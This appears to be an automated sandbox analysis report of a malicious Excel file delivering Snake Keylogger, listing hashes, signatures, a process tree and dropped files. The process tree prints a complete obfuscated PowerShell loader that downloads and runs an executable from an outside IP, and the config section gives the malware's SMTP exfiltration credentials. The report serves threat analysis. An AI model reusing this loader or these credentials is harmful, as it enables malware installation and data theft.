Analysis

  • max time kernel
    101s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    01/10/2024, 05:22

General

  • Target

    AE1169-0106202.xls

  • Size

    640KB

  • MD5

    20e619e98752c941405d8bc0c66242b9

  • SHA1

    0320eeb4e91a97d2d78f1ddb196ff09ca7a95da0

  • SHA256

    5f7ede06fa8da808f891e29fcfc533fcab3f7e9bc02ad68d0e5b24fe006fcbe5

  • SHA512

    1a7f5cb0e1af193d9e6e07b4653648d607c4e931b32be475c0808fdd33a55a1e4257db456f8bda32f69ee09e07ba48248163127b72939eca17619110e997bdc2

  • SSDEEP

    12288:3S6nskrDE0NvKwm3HzxoO1e1ic6yWK0VceVnV2EVS7IIM:3S6nrNvIoOcl637rnV2Ey/M

Malware Config

Extracted

Family

snakekeylogger

Credentials

  • Protocol:
    smtp
  • Host:
    mail.kotobagroup.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Kotoba@2022!

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\AE1169-0106202.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2052
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2340
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PoWErShELL -EX ByPASS -NOp -w 1 -C deVicECrEdEntiAlDEPloYMeNT.exe ; iEX($(IEx('[sYStEm.text.encODinG]'+[ChAR]0X3A+[CHAr]58+'UTf8.gEtSTrIng([systEM.ConvERT]'+[chaR]58+[ChAr]0X3A+'fromBasE64strIng('+[ChAR]34+'JDdZOVg2a1NJMVUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVSRGVGaU5pdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cVloakVseixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTWE9XUEtnLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExSbkZTTSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnd6eGdDeU8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU05DQkxtZik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktIYmtPb1MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVzUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlKUnlETnJlRyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkN1k5WDZrU0kxVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjkvNzgwL2RsbGhvc3QuZXhlIiwiJGVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJULVNMZUVwKDMpO1NUQVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[Char]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2104
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6a7kwxiv.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2708
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9223.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9222.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2544
        • C:\Users\Admin\AppData\Roaming\dllhost.exe
          "C:\Users\Admin\AppData\Roaming\dllhost.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2736
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Users\Admin\AppData\Roaming\dllhost.exe"
            5⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:812

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          1KB

          MD5

          7fb5fa1534dcf77f2125b2403b30a0ee

          SHA1

          365d96812a69ac0a4611ea4b70a3f306576cc3ea

          SHA256

          33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

          SHA512

          a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          436B

          MD5

          971c514f84bba0785f80aa1c23edfd79

          SHA1

          732acea710a87530c6b08ecdf32a110d254a54c8

          SHA256

          f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

          SHA512

          43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

          Filesize

          174B

          MD5

          deb4a51730fe2c81a9889ffb95141973

          SHA1

          393f33c6a562b2a18131ee19d348b26d0a1c42e0

          SHA256

          8eae58a46c0627586c687a9efcbb77bf25ed63b7dcb34dc9910c651f827a5a0f

          SHA512

          adfe0fb1bf60197d09c268fa7a183fd86d59b832f48573de2c6662afc20a11880697675f7b694575f4d5583eaa845cc8cf1a3907e9cb70910aaa6fec128ffa7e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          342B

          MD5

          634cff615c08afac2bded8afd495e6e2

          SHA1

          2d3cc1a6307b5f58ce04b490a8dabc45a81a8617

          SHA256

          40fb38423d0566d0b72cfdcbfc6be6ee578c6f38d74a3790847f79d9429bf9bb

          SHA512

          88cd5efe0b8f4bcd48a2d0aea75ebc18c3b458d8ddb1ce6e24304bc3397d05d47ec2d43b38a89ff567de3599ed5084289a4c5ba62ba9532c4d368ba7223e4742

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

          Filesize

          170B

          MD5

          e3b180eb513e7cdbd32a466c7a76944b

          SHA1

          a3acdbfaecd2cc06d93b4e5f065e97c91775353e

          SHA256

          08e7fa04891874108171c8ced20163e4ce56c0b6d5267e24064e6f13a2a5b63f

          SHA512

          3b070c9f6a68333b85285c3632f84d62cc7c9fa2d51ec042ba73be0cbc2898844f37ab00e6ba551e431d0a181987a170e330bb74d635d2f974e704e78e6838b8

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\56KJ964X\IEnetbookupdation[1].hta

          Filesize

          8KB

          MD5

          c5ceccd555df7698d730dbf80adc5c50

          SHA1

          b1973f00b359aadce3a356c158f1f266f202e046

          SHA256

          19123f85ee5488a249fa8f2260b3c8d75e3cd83ac75e2a4371edd9580e6b37ca

          SHA512

          cdd2f7bb931f7dbd1a6f3a2e4cba96366402ef66be9c7ad70d809e3b09b7a86af662bb86732614b1531701a7e3a2bff5419293e0d210fa7a87bae146f87b0032

        • C:\Users\Admin\AppData\Local\Temp\6a7kwxiv.dll

          Filesize

          3KB

          MD5

          e6c869cc3e49f3c979f944b7f4a339ea

          SHA1

          b911375b39e93225cb9d586c85b96058b8cb7254

          SHA256

          8c482e9681792599c035d748e694aa10d220de0a8187b14332ac0d1d28c690c7

          SHA512

          0774664aee0e55f060a7e31d734061bdc2c1de0a4f97894f8f740ab4760e553c7d27eafd916dd72f503615c3f99b0a67127c459ce05b5dd77e4673537d750c5d

        • C:\Users\Admin\AppData\Local\Temp\6a7kwxiv.pdb

          Filesize

          7KB

          MD5

          f252fdcf1a4b1aa8a9d9cf14eca5559a

          SHA1

          b58bc2d3d3b9fd29b397abcf7fa4554916041a30

          SHA256

          7f7fa10d9533dcf21a30e151689f7c966eeb8da43c7cf100f30e2277ea95e8b3

          SHA512

          cceaba713873206227e29b6bcb109cf197f081e3e8f374d8f4810205a817efd6d7b4bad7e5de871c48641373484111ad242b9ac20421027c62e86bbd1b379caa

        • C:\Users\Admin\AppData\Local\Temp\Cab7E63.tmp

          Filesize

          70KB

          MD5

          49aebf8cbd62d92ac215b2923fb1b9f5

          SHA1

          1723be06719828dda65ad804298d0431f6aff976

          SHA256

          b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

          SHA512

          bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

        • C:\Users\Admin\AppData\Local\Temp\RES9223.tmp

          Filesize

          1KB

          MD5

          fe1f20e9f981c8f8719acf9f29e35460

          SHA1

          371353d9ad142bbcf06c57d4dbff9e3f3c076d77

          SHA256

          0a817b27bd72414e6ec0fc7ca3085dcad8873b8ef12a4c8f7896eded8b87045a

          SHA512

          9035bd2e0296575a620fdb8c7f747d4803bc8e7fd04dc4aa413419af7e2fea2d71ba33210828b4e2833cc5f340b79b5e995f74dbb3851e48465e0db1840320a8

        • C:\Users\Admin\AppData\Roaming\dllhost.exe

          Filesize

          1008KB

          MD5

          46ce226283fb84a52a6a902fc7032363

          SHA1

          c3bb1c73525de62dc7756ad40574ad6c6c148996

          SHA256

          9f3a7c1a4cc7e6e68e610bdce33046edb090a648e362ab8d3df8ba72561e1482

          SHA512

          36ea4f80512c7b20d1c34406b6bdd77f64831c4569d7cb4418d4904dffdb8d33e3b6e4f37fa2b949449c04569bd1f9dc3dd010027de288ab2f8ac9de02d4f34d

        • \??\c:\Users\Admin\AppData\Local\Temp\6a7kwxiv.0.cs

          Filesize

          485B

          MD5

          526cb8f584c9e67eaad8958503b05f30

          SHA1

          2c52fac6e929f46dcb4b0cdbeab72cfb806a2c87

          SHA256

          af9253507cbd12a1875ffc8b02988ef5bccc511c7c77614cb34c5115b42c5b76

          SHA512

          5552f12bb883f18c7901a8d873eb1beaab9aa2e06a213ab476ef5a21b00faa69ab438261b7612c7be0cbd3d9f6086a1861c4f28ab3df41969d227eabbe0d9619

        • \??\c:\Users\Admin\AppData\Local\Temp\6a7kwxiv.cmdline

          Filesize

          309B

          MD5

          de6ba9c0a210aa6d16a8a142749640b9

          SHA1

          dc823c08200a13fe0ccc9db9db08f6973f6e35ad

          SHA256

          63c6d9a457cd43e2bac88f2429a279fb70c0ce912852f238879b8d7f7cec399f

          SHA512

          0c131ce95ee08f898dc5aa1689aea2f3ed37f696df6b70fd3a8eb2ed62032129e6768dc4e87a5f1005c8c5e2b1541b944835adf76e4c18586d75058e42faa469

        • \??\c:\Users\Admin\AppData\Local\Temp\CSC9222.tmp

          Filesize

          652B

          MD5

          62586af8d1ffd5f82f1cda975411ea2b

          SHA1

          06de7ea56ab64bd4fe4d7de20744277c60f1631b

          SHA256

          fcc7f9abf562fa8f3dce94da7bdfb0d6c4062d5caf9b77b5d2d19b430c62cd5f

          SHA512

          c46baca449cfacf74152e3bd62cc5df0c36fe6daec74a8c787d853e7de48c61e76d531d317848b464bd8d086222647f842eb05758c30caf401101f182263fc89

        • memory/812-68-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/812-69-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/812-67-0x0000000000400000-0x0000000000426000-memory.dmp

          Filesize

          152KB

        • memory/2052-58-0x00000000739FD000-0x0000000073A08000-memory.dmp

          Filesize

          44KB

        • memory/2052-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2052-1-0x00000000739FD000-0x0000000073A08000-memory.dmp

          Filesize

          44KB

        • memory/2052-19-0x0000000002450000-0x0000000002452000-memory.dmp

          Filesize

          8KB

        • memory/2052-71-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

        • memory/2052-74-0x00000000739FD000-0x0000000073A08000-memory.dmp

          Filesize

          44KB

        • memory/2924-18-0x0000000000A60000-0x0000000000A62000-memory.dmp

          Filesize

          8KB